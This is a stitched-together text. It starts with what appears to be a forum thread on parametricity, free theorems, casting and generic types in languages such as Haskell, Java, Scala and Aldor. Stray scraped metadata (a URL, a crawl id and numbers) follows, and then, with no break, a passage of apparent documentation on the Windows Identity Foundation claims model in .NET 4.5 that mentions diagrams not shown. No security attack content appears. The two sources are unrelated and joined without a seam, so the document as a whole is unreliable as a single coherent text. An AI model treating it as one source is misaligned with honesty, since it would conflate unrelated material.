ValueType represents the type of the claim value and is typically a URI. For example, the string type is represented as. The value type must be a QName according to the XML schema. The value should be of the format namespace#format to enable WIF to output a valid QName value. If the namespace is not a well-defined namespace, the generated XML probably cannot be schema validated, because there will not be a published XSD file for that namespace. The default value type is. Please see for well-known value types that you can use safely.
Issuer is the identifier of the security token service (STS) that issued the claim. This can be represented as URL of the STS or a name that represents the STS, such as.
OriginalIssuer is the identifier of the STS that originally issued the claim, regardless of how many STSs are in the chain. This is represented just like Issuer.
Subject is the subject whose identity is being examined. It contains a ClaimsIdentity.
Properties is a dictionary that lets the developer provide application-specific data to be transferred on the wire together with the other properties, and can be used for custom validation.
An important property of ClaimsIdentity is Actor. This property enables the delegation of credentials in a multi-tier system in which a middle tier acts as the client to make requests to a back-end service.
To access the current user’s set of claims in an RP application, use Thread.CurrentPrincipal.
The following code sample shows the usage of this method to get a System.Security.Claims.ClaimsIdentity:
For more information, see System.Security.Claims.
|
http://msdn.microsoft.com/en-us/library/vstudio/hh873304
|
CC-MAIN-2014-52
|
refinedweb
| 444
| 50.12
|
Archive for January, 2007|Monthly archive page
IE, Local Playback, FLVs and Querystrings
I had a problem today with a Flash site converted to playback on CD-ROM where it would work fine in Firefox but FLV content would not playback in IE.
It turns out that for the web version if bandwidth had not been detected and tracked that I was appending a ?nocache=[random number] to the filename in order to make sure that the file would load even if cached. On the CD-ROM (or running directly from the hard drive) this would cause a “stream not found” error. Disabling this so that a querystring was not used solved my problem.
Receiving Object Data With .NET/Fluorine/Flex.
So I went through the very basics last time, and while I’m gonna keep it simple, I’m not gonna do a newbie style step-by-step like I did before. For this tutorial I’m going to create a little media library sample for you to work with to show how typed object data can be received via Fluorine.
To start out, download and install the latest version of the Fluorine Gateway. Zoli made some upates since my last posting that will allow your program to run on a shared hosting website. Worked for my last sample anyway. This also goes to show that the folks at The Silent Group are extremely helpful when issues arise with Fluorine. I don’t think the guy sleeps.
Setting up the project folder structure
Start out by setting up a project folder structure by creating a master project folder with a Dot Net and a Flex folder in it. Mine is D:\Projects\Flex\Fluorine Flex 2.
Setting up the Visual Studio project
This time we’ll use the new Fluorine ASP.NET Web Application template. Fire up Visual Studio and create a new web site project. Select the Fluorine template and set up a virtual web directory that points to the project folder’s Dot Net folder. For me it’s. If you tried the last tutorial, you’ll quickly figure out that this template saves you a LOT of steps. Once you’ve created the project, you only have to do one thing to configure Fluorine.
Configuring the Fluorine Gateway in Visual Studio
Open the WEB-INF/flex/services-config.xml file and modify the endpoint node to point to the virtual web directory location of Gateway.aspx. In my case it was. You should be able to copy and paste this url into a browser and a blank page should load without any error messages.. You should still however be able to copy and past the actual URL of the Gateway.aspx file and the blank page should load without any errors. It’s a quick way to check for issues if you are not getting the results you want.
Setting up the Flex project
Start Flex Builder 2 and create a new Flash Data Service Project with the Root folder pointing to the Dot Net folder of your project directory (D:\Projects\Flex\Fluorine Flex 2\Dot Net) and the Root URL pointing to the virtual web directory for the Visual Studio project (). The Context root should be the final bit of the virtual web path (/fluorineflex2). Enter the project name (fluorineflex2) and use the Flex directory of your project folder as the location of your Flex project files (D:\Projects\Flex\Fluorine Flex 2).
If you need help with any of the stuff above please check out the previous tutorial.
Creating a C# compact disc value object class
To start out we’ll need a value object on the server side to pass back to Flex when requested. Let’s create a class called CompactDiscVO that has the properties, artist, title, and year.
[csharp]
using System;
namespace com.darbymedia.medialibrary.vo
{
public class CompactDiscVO
{
public string artist;
public string title;
public string year;
public CompactDiscVO(){}
}
}
[/csharp]
Creating a Fluorine Gateway service class
To start out, create a basic service that you can point to with your Flex RemoteObject. We’ll also include a method called getCDVO that will instantiate and return a CompactDiscVO object.
[csharp]
using System;
using System.Web;
using com.darbymedia.medialibrary.vo;
namespace com.darbymedia.medialibrary.service
{
public class MediaLibraryService
{
public MediaLibraryService() { }
public CompactDiscVO getCDVO()
{
CompactDiscVO cd = new CompactDiscVO();
cd.artist = “Redd Kross”;
cd.title = “Third Eye”;
cd.year = “1990″;
return cd;
}
}
}
[/csharp]
Now we can move on to Flex Builder.
Creating a corresponding Actionscript compact disc value object
In Flex Builder 2 create a CompactDiscVO class. I’ve added a toString() method for demonstration purposes (good for debugging too!). Note that the namespace/package path and class name are the same. This is not absolutely necessary but makes sense here.
[actionscript]
package com.darbymedia.medialibrary.vo
{
public class CompactDiscVO extends Object
{
public var artist:String;
public var title:String;
public var year:String;
public function CompactDiscVO(){}
public function toString():String
{
var s:String = “[CompactDiscVO]“
s += “\nArtist: ” + artist;
s += “\nTitle: ” + title;
s += “\nYear: ” + year;
return s;
}
}
}
[/actionscript]
Building the main MXML application file
This time I’ve decided to use Actionscript only for my RemoteObject file. This way you can compare with the previous tutorial which used an MXML RemoteObject if you want. On creationComplete, the initApp() method instantiates the remote object with the destination, which is the destination name used in the services-config.xml file, the source, which is the namespace and class path of the C# service class we created, and listeners for result and fault events. Here is the MXML:
[xml]
[/xml]
At this point we’re calling the getCDVO method on the service immediately. roResult will trace out information to the console when run in debug mode. Go ahead and do that and you’ll get the following:
[SWF] /fluorineflex2/fluorineflex2/FluorineFlex2-debug.swf – 628,788 bytes after decompression
[object Object]
Redd Kross
null
Interesting. In roResult, our first trace of event.result gives us [object Object] so obviously we’re getting an Object type, but our CompactDiscVO.toString() method is not kicking in. Our second trace of the event.result.artist property, Redd Kross, shows that our data came through but when we try to put it into a typed variable as CompactDiscVO for our third trace we get null. So we are getting data back but it’s not typed correctly. It’s just a generic Object with properties.
To force the correct mapping you have use the flash.net.registerClassAlias() method. You pass it the full namespace and class name of the server side class as a string and the Actionscript class you want it to map to, like so:
flash.net.registerClassAlias(”com.darbymedia.medialibrary.vo.CompactDiscVO”, CompactDiscVO);
I put this in the initApp() method.
Now our MXML looks like this:
[xml]
[/xml]
Run this in debug mode and you can see that our first trace of event.result gives us the toString() output of the CompactDiscVO class, our second trace of event.result.artist gives us Redd Kross, and our third trace of the typed variable, cd, prints out not null, but the toString() output as well! Pretty cool!
Doing something with the content
Now let’s put this data into display items. I’ve added some labels and input fields to hold the data, a button to trigger the return, and an alert for any faults. I’ve put the call to the remote object’s getCDVO in the button’s click handler this time. Check it out:
[xml]
[/xml]
Check it out here.
Sending is easy…next time we’ll do that.
How to Set Up .NET Remoting with Flex 2 and Fluorine.
- Create a project folder. I called mine Fluorine Flex.
- Inside this folder create a folder called
Dot Netfor the .NET code and a folder called
Flexfor the Flex code
- Start Visual Studio. I’m using Visual Studio 2005 Standard Edition
File -> New -> Web Site
- In the dialog box, select
Empty Website
- In the language dropdown select
C#
- In the location dropdown section select
http
- On the right select
- In the new dialog on the left select
Local IIS
- On the top right select
Create new virtual directory
- Enter an alias name. I entered
fluorineflex.
- Browse and select the
Dot Netfolder in your project folder and select
OK
- Now select the virtual directory you just created and select
OK
- In the Solution Explorer, right-click the project icon and select
Add Reference
- Under the .NET tab locate and select
Fluorineand select
OK
- Right-click the project icon and select
Add New Item
Web Configuration File. Leave the name as is and select
Add
- In the
system.webnode of the new
Web.configfile add the following:[xml][/xml]
and save.
- Right-click the project icon and select
Add Item
Web Formand name the file
Gateway.aspx
- Right-click the project icon and select
New Folder. Name it
WEB-INF.
- Right-click the new
WEB-INFfolder and select
New Folder. Name it
flex.
- Right-click the new
flexfolder and select
Add New Item.
XML Fileand name it
services-config.xml.
- Open the new
services-config.xmland paste the following content below the initial
xmltag:
[xml]
*
[/xml]
In the
endpointnode change the
uriproperty to point to Gateway.aspx in the virtual directory that you created. In my case it’s
uri="".
Download and install(Not necessary – Thanks Richard!)
Flex Data Services 2 Expressfrom the Flex download page. No serial number is neccessary for development work.
- Start Flex Builder 2.
File -> New -> Flex Project.
Flex Data Services.
Compile application locally in Flex Builder.
- Uncheck
Use default local Flex Data Services Location.
- In
Root folderselect
Browseand select the
Dot Netfolder in your project folder. For me it was
D:\Projects\Flex\Fluorine Flex\Dot Net.
- In
Root URLenter the path to the virtual directory created earlier. In my case it was.
- As far as I can tell
Context rootshould be the last folder name of your virtual web directory. Mine was
/fluorineflex.
- Uncheck the
Use default locationbox and select the
Flexfolder in you project folder. In my case it’s
D:\Projects\Flex\Fluorine Flex\Flex.
Finish
- In Visual Studio, right-click the project icon and select
Add New Item.
Classand name it
FlexService.cs. (You can name the class anything you want at this point. I’ll use FlexService.)
- When prompted to put the file in an
App_Codefolder, click
Yes.
- At this point you’ll only need to “use”
Systemand
System.Web, but it won’t hurt to leave the other classes.
- I’ve cleaned up mine and given it a fancy namespace (com.darbymedia.com.flex) to look like this:
[csharp]
using System;
using System.Web;
namespace com.darbymedia.flex
{
public class FlexService
{
public FlexService() { }
}
}
[/csharp]
- Add a function called
echoand have it return a message that is sent and our class looks like this:
[csharp]
using System;
using System.Web;
namespace com.darbymedia.flex
{
public class FlexService
{
public FlexService() { }
public string echo(string msg)
{
return “echo(msg) msg: ” + msg;
}
}
}
[/csharp]
- Return to Flex Builder 2
- Create a RemoteObject with the following properties:
- destination:
fluorine. This is the destination set up in the
services-config.xmlfile.
- source:
com.darbymedia.flex.FlexService. This is the namespace and class name for our service.
- result:
roResult. This is method to receive the return value. We’ll do this in a minute.
- fault:
roFault. This is the method to receive any errors. We’ll make this in sec too.
Adding an input field, submit button, output text area and a bad call button your mxml will look like this:
[xml]
[/xml]
- Now to create the roResult and roFault methods as well as button handlers. They look like this:
[xml]
[/xml]
- Now that we have our RemoteObject set up we can call any method within our service class directly.
I’ve finally gotten the bug to get this Flex thing going and my only stumbling block for really useful applications was that for server-side stuff I’m way more adept with Visual Studio .NET and C# than I am with PHP. I had been looking for a solution and found WebOrb, which requires a server install and isn’t free for AMF3. Since I use shared hosting this is really not an option. Then I found Fluorine created by Zoltan Csibi at The Silent Group which is open source after a bit of teeth gnashing easy to set up. After finding Sam Shrefler’s excellent examples I decided to put something together something that was a bit more basic than his Cairngorm examples (Not that those weren’t basic and very helpful!).
I’m going to start out with something extremely simple just to demonstrate the setup. The service will basically echo back any string you send to it. I saw this morning as I got the latest update that it installs a Visual Studio project template that is probably the best way to go when setting things up, but I’ve decided to go ahead and go through the steps of setting things up manually so that hopefully the purpose of the elements is more clear.
Download and Install the Fluorine Gateway
Go to the Fluorine download page and download and install the Fluorine Windows Installer.
Setting Up Project Folders
Creating the Project in Visual Studio .NET
Configuring the Project in Visual Studio .NET
I gleaned this mostly from Setting up a Flash Remoting-enabled ASP.NET application at the Fluorine site.
The next part is from the Flex2 basic setup section within Using Flex2 and AMF3 on the Fluorine site..
Configuring the Flex Project
Now we’re ready to ROCK!
Creating a Fluorine Service in .NET
Accessing the Service via Flourine in Flex
Now the entire mxml file looks like this:
[xml]
[/xml]
Give it a whirl! Type a message and submit it. Then click the bad call button to see what happens when an error occurs.
Here’s what it’s supposed to look like.
This is super basic but it should get you up and running. Next I’ll be sending and receiving objects, but something tells me you’ll figure that out on your own!!
SWFObject: Use It DAMMIT!
Or at least use something! I’m continually seeing professional level sites that directly embed swfs and to my dismay, display “click to enable” messages in IE. At this point it really drives me up a wall.
Get a clue. News Alert: Due to some silly lawsuit, in IE when you embed a swf in a website the tag must be written by an externally linked javascript file. This is well known. You’re a professional. FIX IT. JEBUS.
I’m not gonna embarrass anyone by including examples but, don’t show your fancy blinking, flickering flash or worst yet, provide a link to your client’s flawed embeds and try to impress anyone. You’re doing your clients and your potential clients a disservice since they probably don’t understand.
Be a pro. Do it right. Visit everyone’s friend Geoff Stearns at Deconcept, get SWFObject and USE IT.
Good Riddance 2006
In what started out as an exciting, hopeful, successful year ended with a flop – just barely dragging over the finish line. Other than the great music I saw and the new friends I made, career-wise things have just not panned out over the last eight months.
What 2007 holds is yet to be seen. I’m looking for a new ActionScript coder job in the Atlanta area which hopefully will put the excitement, hope, and success back into my future. If anyone has any leads please let me know! (brentpub [at] darbymedia [dot] com)
|
http://darbymedia.wordpress.com/2007/01/
|
crawl-002
|
refinedweb
| 2,617
| 66.13
|
The problem Rank Transform of an Array Leetcode Solution provided us with an array of integers. The array or the given sequence is unsorted. We need to assign ranks to each integer in the given sequence. There are some restriction s for assigning the ranks.
- The ranks must start with 1.
- The larger the number, the higher the rank (larger in numeric terms).
- Ranks must be as small as possible for each integer.
So, let’s take a look at a few examples.
arr = [40,10,20,30]
[4,1,2,3]
Explanation: It will be easier to understand the example if we sort the given input. After sorting, the input becomes [10, 20, 30, 40]. Now if we follow the given rules. The ranks will be [1, 2, 3, 4] as per the new modified array. If we match the elements in the output. They are the same, confirming the correctness of the output.
[100,100,100]
[1, 1, 1]
Explanation: Since all the elements in the input are the same. Thus all must have the same rank that is 1. Hence the output contains three instances of 1.
Approach for Rank Transform of an Array Leetcode Solution
The problem Rank Transform of an Array Leetcode Solution asked us to assign ranks to the given sequence. The conditions that are to be met are already stated in the problem description. So, instead of describing them once again. We will go through the solution directly. So, as seen in the example. It’s easier to assign ranks to a sorted sequence. So, we use an ordered map to store the elements in the given input sequence. Using an ordered map makes sure that the elements are in sorted order.
Now, we must deal with the third condition. The third condition states that we must assign the smallest ranks as much as possible. So, we simply assign numbers from 1 to the keys present on the map. This takes care of all three imposed conditions. The rank of larger numbers is higher. The ranks start from 1. They are as small as possible.
Now, we simply traverse through the input sequence and assign the ranks stored in the map.
Code
C++ code for Rank Transform of an Array Leetcode Solution
#include <bits/stdc++.h> using namespace std; vector<int> arrayRankTransform(vector<int>& arr) { map<int, int> m; for(auto x: arr) m[x] = 1; int lst = 0; for(auto x: m){ m[x.first] = lst + 1; lst++; } for(int i=0;i<arr.size();i++) arr[i] = m[arr[i]]; return arr; } int main(){ vector<int> input = {40, 10, 30, 20}; vector<int> output = arrayRankTransform(input); for(auto x: input) cout<<x<<" "; }
4 1 3 2
Java code Rank Transform of an Array Leetcode Solution
import java.util.*; import java.lang.*; import java.io.*; class Main { public static int[] arrayRankTransform(int[] arr) { Map<Integer, Integer> m = new TreeMap<Integer, Integer>(); for(int x: arr) m.put(x, 1); int lst = 0; for(Integer x: m.keySet()){ m.put(x, lst + m.get(x)); lst = m.get(x); } for(int i=0;i<arr.length;i++) arr[i] = m.get(arr[i]); return arr; } public static void main (String[] args) throws java.lang.Exception { int[] input = {40, 10, 30, 20}; int[] output = arrayRankTransform(input); for(int x: output) System.out.print(x+" "); } }
4 1 3 2
Complexity Analysis
Time Complexity
O(NlogN), since we used an ordered map we have the logarithmic factor for insertion, deletion, and searching.
Space Complexity
O(N), because we use an ordered map to store the elements in the input.
|
https://www.tutorialcup.com/leetcode-solutions/rank-transform-of-an-array-leetcode-solution.htm
|
CC-MAIN-2021-49
|
refinedweb
| 603
| 68.47
|
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
How to resolve "Integrity Error" on change.password.user when deleting a user after changing his/her password?
The steps to replicate this issue are as follows:
Create a new user (from Odoo "Users" menu)
Set the new user's password (which can be anything, apparently)
Delete that new user.
The error I got was
Integrity Error
The operation cannot be completed, probably due to the following:
- deletion: you may be trying to delete a record while other records still reference it
- creation/update: a mandatory field is not correctly set
[object with reference: Change Password Wizard User - change.password.user]
From what I Googled, it seems that the reason is because the "change.password.user" table (the actual database table name is "change_password_user") still contains a reference to the user I'm trying to delete. But why is that so? And how to fix this problem? Should I manually delete the entry in change.password.user table?
You could make a fix module, with this python code:
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.multi
def unlink(self):
for record in self:
self.env.cr.execute("DELETE FROM change_password_user WHERE user_id=%s;",
(record.id,))
record.un
|
https://www.odoo.com/forum/help-1/question/how-to-resolve-integrity-error-on-change-password-user-when-deleting-a-user-after-changing-his-her-password-89203
|
CC-MAIN-2017-04
|
refinedweb
| 227
| 57.98
|
Hide Forgot
Description of problem:
Kombu appears to depend on the ``vine`` Python module, but it's not installed.
Version-Release number of selected component (if applicable):
python3-kombu-4.0.2-1.fc26.noarch
How reproducible: Always
Steps to Reproduce:
1. sudo dnf install python3-kombu
2. Open a Python 3 shell
3. ``from kombu import five``
Actual results:
[vagrant@rawhide yum.repos.d]$ python3
Python 3.6.0 (default, Dec 27 2016, 20:50:38)
[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from kombu import five
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python3.6/site-packages/kombu/five.py", line 6, in <module>
import vine.five
ModuleNotFoundError: No module named 'vine'
>>> quit()
[vagrant@rawhide yum.repos.d]$ rpm -q python3-kombu
python3-kombu-4.0.2-1.fc26.noarch
Expected results:
Successfully import all modules
Yes, that was overlooked somehow. It is submitted for review, and I already asked for a review swap on devel@f.o
A dependency of vine (python-case) was packaged and included in rawhide yesterday.
|
https://bugzilla.redhat.com/show_bug.cgi?id=1409908
|
CC-MAIN-2022-05
|
refinedweb
| 195
| 62.54
|
Can I use matplotlib to generate graphs from my data?
Yes you can, and your graphs will be saved as an image file in your directory.
The block of code below gives you an example of how you would do this:
import matplotlib matplotlib.use("Agg") import matplotlib.pyplot as plt fig = plt.figure() ax = fig.add_subplot(111) ax.plot(range(100)) fig.savefig("graph.png")
graph.png will then show up in your home directory. Simply put, wherever you
might normally use
plt.show() to display your graph on screen you should use
fig.savefig('your_graph.png') to save it as an image file instead.
Once you've done that, you can view the graph from your browser using a URL
like this:
What do do if you're seeing errors about Tkinter
Make sure to include the
matplotlib.use("Agg") line from the example above --
that's the bit that sets the "backend" that matplotlib uses to draw graphics.
Tkinter is the default, but it won't work on PythonAnywhere. Agg works fine...
(See this page on tkinter for more info).
Jupyter Notebooks
With all that said, probably your best bet for working interactively with data and graphs is to use a Jupyter Notebook. That's a premium feature on PythonAnywhere however...
|
https://help.pythonanywhere.com/pages/MatplotLibGraphs/
|
CC-MAIN-2018-30
|
refinedweb
| 214
| 68.57
|
The code is clean and easy to understand, I wrote this because I saw some others' solution keep comparing the current distance with the min distance, which is kinda waste of time, so I come up with an idea to just compare when needed.
public class Solution { public int shortestDistance(String[] words, String word1, String word2) { int idx1 = -1, idx2 = -1; int dis = Integer.MAX_VALUE; for(int i = 0; i < words.length; i++) { String word = words[i]; if(idx1 * idx2 <= 0) { // either found if(word1.equals(word)) { // word1 found idx1 = i; dis = Math.min(dis, idx1 - idx2); idx2 = -1; // set word2 not found } if(word2.equals(word)) { // word2 found idx2 = i; dis = Math.min(dis, idx2 - idx1); idx1 = -1; // set word1 not found } } else { // neither found if(word1.equals(word)) idx1 = i; if(word2.equals(word)) idx2 = i; } } return dis; } }
|
https://discuss.leetcode.com/topic/57627/2ms-easy-to-understand-java-solution-beats-99-70
|
CC-MAIN-2017-51
|
refinedweb
| 140
| 84.88
|
"Ralf W. Grosse-Kunstleve" <rwgk at yahoo.com> writes: > --- David Abrahams <dave at boost-consulting.com> wrote: >> > This solution is based on what I found in SWIG-1.3.24/Lib/python/pyrun.swg. >> > At the heart of the solution is this simple fragment: >> > >> > static void* extract(PyObject* op) \ >> > { \ >> > if (std::strcmp(op->ob_type->tp_name, "PySwigObject") != 0) >> > return 0; \ >> >> Isn't there a type object somewhere you can compare ob_type with? > > It seemed hard to me. Here is what I understand: > > SWIG is a wrapper generator (more similar to Pyste than to Boost.Python). In > the SWIG-1.3.24/Examples/python/class that I was using, SWIG copies a big chunk > of code into the generated example_wrap.cxx. This includes the complete > definition of the type object for PySwigObject. The type definition is > implemented as a group of static objects in this function: > > SWIGRUNTIME PyTypeObject* > PySwigObject_GetType(); > > We'd have to get hold of this function, which I believe will complicate the > linking severely. But even if we did, it wouldn't get us very far since each > SWIG-generated extension has its own version of the type object, with its own > address. That's probably why I found this function: > > SWIGRUNTIMEINLINE int > PySwigObject_Check(PyObject *op) { > return ((op)->ob_type == PySwigObject_GetType()) > || (strcmp((op)->ob_type->tp_name,"PySwigObject") == 0); > } > > I am still wondering why SWIG does "one or the other" and not simply the more > general "other". The best explanation I can find for myself is optimization for > speed (pointer equivalence vs. string comparison). Anyway, for me the > conclusion was clear: it is definitely not worth complicating the build process > for such a minute gain. If the Python/C++ combination is used sensibly the > runtime difference will be unmeasurable anyway. You have grown very wise, O grasshopper. >> Heh, so that's how they do it. Pretty lame, IMO. > > Hey, let's be politically correct: Pretty basic, at that level. > They decided to put all their energy into a special parser, which > clearly has some advantages if you have to deal a lot with C-style > interfaces. E.g. the int* question is coming up a lot. You shall now be my master. >> Well, inheritance >> won't work; a swig-wrapped Derived won't be able to be passed where a >> Base is expected. If that doesn't matter, it's fine. > > Is there a way to write something like: > > bases_of<Circle, mpl::vector<Shape> >(); In principle, yes, but it would take some nontrivial coding. >> > boost_python_swig_args_ext.show(c.this) >> > boost_python_swig_args_ext.show(s.this) >> >> You should have part of the test that shows non-matching types are >> rejected. > > I figured rejection is tested since the overload resolution couldn't work > otherwise. Oh, are you testing overload resolution? If so, that's enough. > What exactly do you have in mind? > >> > David, would you want to include the core of swig_args_ext.cpp in, >> > e.g., boost/python/swig_arg.h? I think it would be a valuable >> > addition. There are many SWIG-wrapped libraries. People could easily >> > use them while writing their own extensions with Boost.Python. >> >> Sounds great! Needs docs, of course ;-) > > Would you be happy with a page like I wrote for the pickle suite, > linked from the main page, e.g. "SWIG interoperability"? Great! > But I still have a question. I don't really like the interface I came up with > since it requires two steps: > > 1. BOOST_PYTHON_SWIG_ARG(Circle) > > 2. swig_arg<Circle>(); > > It would be nicer if one could simply write > > swig_arg<Circle>("Circle"); > > Is there any way this could be achieved?. > Actually, here is another question: would it be best to wait until Boost 1.33 > is out? We are in a main trunk feature-freeze, but doing it now on a branch would be better than waiting. -- Dave Abrahams Boost Consulting
|
https://mail.python.org/pipermail/cplusplus-sig/2005-July/008835.html
|
CC-MAIN-2014-10
|
refinedweb
| 628
| 67.15
|
Search: Search took 0.04 seconds.
- 24 Nov 2012 11:22 AM
I've changed my code (without "()"), but the problem is present again...
I've also used your example
Ext.Msg.alert('Hello', 'Hi');
but no message on display....
- 24 Nov 2012 11:15 AM
- Replies
- 3
- Views
- 299
If i don't use ui="round" the problem is not present. The problem is with ui="round" only...
- 24 Nov 2012 3:56 AM
- Replies
- 3
- Views
- 299
If I create a native app for iOS the last list item was as in this image
40299
- 24 Nov 2012 12:29 AM
- Replies
- 2
- Views
- 423
This function works in Chrome and doesn't works in iOS:
getData: function(url,methodName,args,fnSuccessCallback,scope,timeout,waitMsgCmp,fnErrCallback) {
...
- 24 Nov 2012 12:24 AM
I'm using this function in my app:
alertPopup: function(msg, caption, fnCallback) {
if(caption===undefined||caption===null){
caption="Messaggio";
}
...
- 21 Nov 2012 12:35 PM
- Replies
- 2
- Views
- 423
I have used Ext.data.JsonP in my sencha 2.1.0 app and it works until I use it in browser. I'm using Sencha Architect and after iOS packaging when I try my app on device (or simulator) no data are...
- 21 Nov 2012 12:26 PM
I have used Ext.Msg.alert in my sencha 2.1.0 app and it works until I use it in browser. I'm using Sencha Architect and after iOS packaging when I try my app on device (or simulator) no messagges...
- 28 Feb 2012 7:28 AM
Yes, my component extend mitchell simoens component. I apply to it filter feature only...
- 28 Feb 2012 7:26 AM
You can find a little image here:
- 27 Feb 2012 12:44 PM
This week is very hard for me and it's a problem for me to have time for change the grid code. I'm very happy for yor discovery about datepicker an i will try to work on it in ma week end, but if you...
- 23 Feb 2012 12:05 PM
Actually my android device is broken and I'm waiting for to have it again. I have not idea about the problem. Can you try it on android 3.0?
You can also try to disable component filtering and,...
- 15 Feb 2012 3:09 PM
I cannot solve this problem... I have seen that the problem is because construct method cannot call the setter and getter creation. Is it normal for all component of for this only?
Thanks...
- 15 Feb 2012 3:03 PM
The night is long and one hour less of sleep is a good investment if it give me the opportunity of solve the B3 issue with my component... :)
The problem was not in CSS i think, because I don't use...
- 15 Feb 2012 12:55 PM
Thanks for your post and again for your help in past also.
Sorry but I have not time until next week to work about this issue. I'm not using beta 3 at the moment but next week I will look all.
- 12 Feb 2012 11:38 AM
I'm trying to develop a component for display a store dynamically because. I have a store not always equal I cannot use a static grid structure...
I need really help, please... I'm working to this...
- 11 Feb 2012 6:11 AM
I'm trying to define "config" section in constructor method of a my extended 'MyRecordItem' class.
But if I set the "config" block under costructor method using "Ext.apply" the ComponentView doesn't...
- 10 Feb 2012 4:03 AM
thanks for your answer.
I will try with 'after list refreshed' option.
- 10 Feb 2012 2:46 AM
Hi Mitchell,
as yow know, my ext.ux.gp.grid component inherits from your very useful component. Now I'd like add a button inside a column, but your component use XTemplate and the under dataview is...
- 9 Feb 2012 11:10 PM
- Replies
- 8
- Views
- 974
Using 'Ext.data.JsonP' it's all ok.
thanks
- 9 Feb 2012 12:33 PM
- Replies
- 2
- Views
- 383
Thanks for your help about how I can optimize my code!
About ActionSheet I think it is not the same, because it is possible show my menu also like a button menu using showBy...
Thanks again
- 9 Feb 2012 7:13 AM
In MVC app I'm using paging feature and I'm listening 'itemtaphold' event from a controller.
'gpm-view-customers [xtype=touchgridpanel]' : {
itemtaphold :...
- 9 Feb 2012 4:19 AM
I have changed in GitHub repo the component namespace from Ext.gp.Grid to Ext.ux.gp.Grid for to respect the usually namespaces roules
- 9 Feb 2012 4:16 AM
- Replies
- 2
- Views
- 383
I have published in GitHub a new component. It can show a menu sized by items count.
I hope it is useful.
GitHub link:
31532
31533
- 9 Feb 2012 1:06 AM
- Replies
- 5
- Views
- 998
Ops.... Syntax Error!!!!
Thanks
- 8 Feb 2012 11:59 PM
Jump to post Thread: [PRx] to [BETA1] src folder by tino7_03
- Replies
- 1
- Views
- 426
Before BETA1 I copied the sencha-touch-all-debug.js file and resources folder only in in my project. Now I must copy all src folder also.
If I don't copy it I receive this error (for example):...
Results 1 to 25 of 102
|
http://www.sencha.com/forum/search.php?s=22e907418a196834ec8133bff3b5146e&searchid=3107141
|
CC-MAIN-2013-20
|
refinedweb
| 903
| 83.36
|
. Multiple test
groups can be categorized by a call to
AT_BANNER.
All of the public Autotest macros have all-uppercase names in the namespace ‘^AT_’ to prevent them from accidentally conflicting with other text; Autoconf also reserves the namespace ‘^_AT_’ for internal macros. All shell variables used in the testsuite for internal purposes have mostly-lowercase names starting with ‘at_’. Autotest also uses here-document delimiters in the namespace ‘^_AT[A-Z]’, and makes use of the file system namespace ‘^at-’.
Since Autoconf is built on top of M4sugar (see Programming in M4sugar) and M4sh (see Programming in M4sh), you must also be aware of those namespaces (‘^_?\(m4\|AS\)_’). In general, you should not use the namespace of a package that does not own the macro or shell code you are writing.
Initialize Autotest. Giving a name to the test suite is encouraged if your package includes several test suites. Before this macro is called,
AT_PACKAGE_STRINGand
AT_PACKAGE_BUGREPORTmust be defined, which are used to display information about the testsuite to the user. Typically, these macros are provided by a file package.m4 built by make (see Making testsuite Scripts), in order to inherit the package name, version, and bug reporting address from configure.ac.
State that, in addition to the Free Software Foundation's copyright on the Autotest macros, parts of your test suite are covered by copyright-notice.
The copyright-notice shows up in both the head of testsuite and in ‘testsuite --version’.
Accept options to the testsuite, the variable will be set to ‘:’. If the user does not pass the option, or passes --no-option, then the variable will be set to ‘false’.
action-if-given is run each time the option is encountered; here, the variable
at_optargwill be set to ‘:’ or ‘false’ as appropriate..
Accept options with arguments=arg or --option arg to the testsuite, the variable will be set to ‘arg’.
action-if-given is run each time the option is encountered; here, the variable
at_optargwill be set to ‘arg’..
Enable colored test results by default when the output is connected to a terminal. identifies the start of a category of related test groups. When the resulting testsuite is invoked with more than one test group to run, its output will include a banner containing test-category-name prior to any tests run from that category. The banner should be no more than about 40 or 50 characters. A blank banner will not print, effectively ending a category and letting subsequent test groups behave as though they are uncategorized when run in isolation.
This macro starts a group of related tests, all to be executed in the same subshell. It accepts a single argument, which holds a few words (no more than about 30 or 40 characters) quickly describing the purpose of the test group being started. test-group-name must not expand to unbalanced quotes, although quadrigraphs can be used.
Associate the space-separated list of keywords to the enclosing test group. This makes it possible to run “slices” of the test suite. For instance, if some of your test groups exercise some ‘foo’ feature, then using ‘AT_KEYWORDS(foo)’ lets you run ‘./testsuite -k foo’ to run exclusively these test groups. The test-group-name.
Make the test group fail and skip the rest of its execution, if shell-condition is true. shell-condition is a shell expression such as a
testcommand. Tests before AT_FAIL_IF will be executed and may still cause the test group to be skipped. You can instantiate this macro many times from within the same test group.
You should use this macro only for very simple failure conditions. If the shell-condition could emit any kind of output you should instead use AT_CHECK likeAT_CHECK([if shell-condition; then exit 99; fi])
so that such output is properly recorded in the testsuite.log file.
Determine whether the test should be skipped because it requires features that are unsupported on the machine under test. shell-condition is a shell expression such as a
testcommand. Tests before AT_SKIP_IF will be executed and may still cause the test group to fail. You can instantiate this macro many times from within the same test group.
You should use this macro only for very simple skip conditions. If the shell-condition could emit any kind of output you should instead use AT_CHECK likeAT_CHECK([if shell-condition; then exit 77; fi])
so that such output is properly recorded in the testsuite.log file. must end with an end of line. file must be a single shell word that expands into a single file name.
Execute a test by performing given shell commands. commands is output as-is, so shell expansions are honored. These commands should normally exit with status, while producing expected stdout and stderr contents. If commands exit with unexpected status 77, then the rest of the test group is skipped. If commands exit with unexpected status 99, then the test group is immediately failed. Otherwise, if this test fails, run shell commands run-if-fail or, if this test passes, run shell commands run-if-pass.
This macro must be invoked in between
AT_SETUPand
AT_CLEANUP.
If status is the literal ‘ignore’, then the corresponding exit status is not checked, except for the special cases of 77 (skip) and 99 (hard failure). The existence of hard failures allows one to mark a test as an expected failure with
AT_XFAIL_IFbecause a feature has not yet been implemented, but to still distinguish between gracefully handling the missing feature and dumping core. A hard failure also inhibits post-test actions in run-if-fail.
If the value of the stdout or stderr parameter is one of the literals in the following table, then the test treats the output according to the rules of that literal. Otherwise, the value of the parameter is treated as text that must exactly match the output given by commands on standard output and standard error (including an empty parameter for no output); any differences are captured in the testsuite log and the test is failed (unless an unexpected exit status of 77 skipped the test instead). The difference between
AT_CHECKand
